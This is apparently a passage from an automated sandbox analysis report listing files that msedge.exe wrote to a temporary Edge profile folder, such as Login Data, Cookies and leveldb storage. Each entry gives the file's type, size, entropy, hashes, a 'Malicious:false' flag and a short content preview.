                                                                                                                                                                                                                                                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.33890226319329847
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:TLMfly7aoxrRGcAkSQdC6ae1//fxEjkE/RFL2iFV1eHFxOUwa5qgufTsZ75fOSI:TLYcjr0+Pdajk+FZH1W6UwccI5fBI
                                                                                                                                                                                                                                                                                                              MD5:971F4C153D386AC7ED39363C31E854FC
                                                                                                                                                                                                                                                                                                              SHA1:339841CA0088C9EABDE4AACC8567D2289CCB9544
                                                                                                                                                                                                                                                                                                              SHA-256:B6468DA6EC0EAE580B251692CFE24620D39412954421BBFDECB13EF21BE7BC88
                                                                                                                                                                                                                                                                                                              SHA-512:1A4DD0C2BE163AAB3B81D63DEB4A7DB6421612A6CF1A5685951F86B7D5A40B67FC6585B7E52AA0CC20FF47349F15DFF0C9038086E3A7C78AE0FFBEE6D8AA7F7E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.294848678262975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kNcs1923fQyS/0a2jM8B2KLlmi+q2P923fQyS/0a2jMGIFUv:XBhjFLwv4hEFUv
                                                                                                                                                                                                                                                                                                              MD5:924BABD7144617DBB263D562232680B5
                                                                                                                                                                                                                                                                                                              SHA1:BCDEA1CD3C83D0C4D853C1049496419AF2B77C59
                                                                                                                                                                                                                                                                                                              SHA-256:BD47B1E4647EC45C5C6A6863867D22465F050CE55CD4B78A4683B7F0BB746DAA
                                                                                                                                                                                                                                                                                                              SHA-512:D7C8529B2B3A1D2D5642027BE6764841C72348BC982F3069BF9D42CEAC574E35A6B10E74CA9B0533AE418DB3DC2FDBEA6727FA021DEE974F7E05358CB4FE4654
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:53.731 1b48 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb since it was missing..2024/12/22-17:54:53.879 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Local Storage\leveldb\MANIFEST-000001

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Login Data

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\2f740d53-08de-40e6-b690-c4aeffc39359.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\4350cce0-bb81-4ce2-8238-dcf1c5e75213.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\95f8b014-1511-4ec0-bede-a4f7d783462c.tmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.5559635235158827
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:OIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                                              MD5:9AAAE8C040B616D1378F3E0E17689A29
                                                                                                                                                                                                                                                                                                              SHA1:F91E7DE07F1DA14D15D067E1F50C3B84A328DBB7
                                                                                                                                                                                                                                                                                                              SHA-256:5B94D63C31AE795661F69B9D10E8BFD115584CD6FEF5FBB7AA483FDC6A66945B
                                                                                                                                                                                                                                                                                                              SHA-512:436202AB8B6BB0318A30946108E6722DFF781F462EE05980C14F57F347EDDCF8119E236C3290B580CEF6902E1B59FB4F546D6BD69F62479805B39AB0F3308EC1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\SCT Auditing Pending Reports~RF4c8ea.TMP (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):36864
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                              MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                                              SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                                              SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                                              SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\README

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.2629097520179995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:RGXKRjg0QwVIWRKXECSAV6jDyhjgHGAW+LB2Z4MKLFE1SwhiFAfXQmWyKBPMwRgK:z3frsUpAQQgHGwB26MK8Sw06fXQmWtRT
                                                                                                                                                                                                                                                                                                              MD5:643E00B0186AA80523F8A6BED550A925
                                                                                                                                                                                                                                                                                                              SHA1:EC4056125D6F1A8890FFE01BFFC973C2F6ABD115
                                                                                                                                                                                                                                                                                                              SHA-256:A0C9ABAE18599F0A65FC654AD36251F6330794BEA66B718A09D8B297F3E38E87
                                                                                                                                                                                                                                                                                                              SHA-512:D91A934EAF7D9D669B8AD4452234DE6B23D15237CB4D251F2C78C8339CEE7B4F9BA6B8597E35FE8C81B3D6F64AE707C68FF492903C0EDC3E4BAF2C6B747E247D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Microsoft Edge settings and storage represent user-selected preferences and information and MUST not be extracted, overwritten or modified except through Microsoft Edge defined APIs.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage\000001.dbtmp

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7273991737283296
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                                                                                                                                                              MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                                                                                                                                                              SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                                                                                                                                                              SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                                                                                                                                                              SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f...............

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\Session Storage\CURRENT (copy)

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
